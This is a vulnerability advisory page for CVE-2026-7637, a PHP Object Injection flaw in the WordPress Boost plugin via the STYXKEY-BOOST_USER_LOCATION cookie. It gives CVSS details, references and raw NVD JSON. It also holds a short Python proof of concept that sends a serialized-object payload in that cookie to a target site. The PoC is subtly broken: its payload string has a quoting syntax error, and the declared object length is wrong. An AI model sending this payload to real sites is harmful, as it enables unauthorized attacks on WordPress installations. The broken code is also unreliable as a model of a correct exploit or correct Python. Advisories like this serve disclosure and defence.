CVE-2026-7637

Description

The Boost plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 2.0.3 via deserialization of untrusted input in the STYXKEY-BOOST_USER_LOCATION cookie. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WordPress Boost Plugin <= 2.0.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

target_url = "http://target-wordpress-site.com"

# Placeholder payload. In a real attack, this would be a serialized object
# designed to trigger a POP chain in another installed plugin.
# Example: O:8:"StdClass":0:{}
# Attackers need to generate a specific gadget chain payload.
payload = "O:20:"Gadget_Class_Name":0:{}"

cookies = {
    "STYXKEY-BOOST_USER_LOCATION": payload
}

response = requests.get(target_url, cookies=cookies)

if response.status_code == 200:
    print("Payload sent successfully via cookie.")
else:
    print(f"Request failed with status code: {response.status_code}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-7637
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-7637
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-7637/
[4] VulDB https://vuldb.com/cve/CVE-2026-7637
[5] https://www.pixelyoursite.com/boost-plugin
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/e391f560-2037-4180-a77e-1731524a318c?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-7637", "sourceIdentifier": "[email protected]", "published": "2026-05-20T04:16:56.747", "lastModified": "2026-05-20T13:54:54.890", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Boost plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 2.0.3 via deserialization of untrusted input in the STYXKEY-BOOST_USER_LOCATION cookie. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://www.pixelyoursite.com/boost-plugin", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e391f560-2037-4180-a77e-1731524a318c?source=cve", "source": "[email protected]"}]}}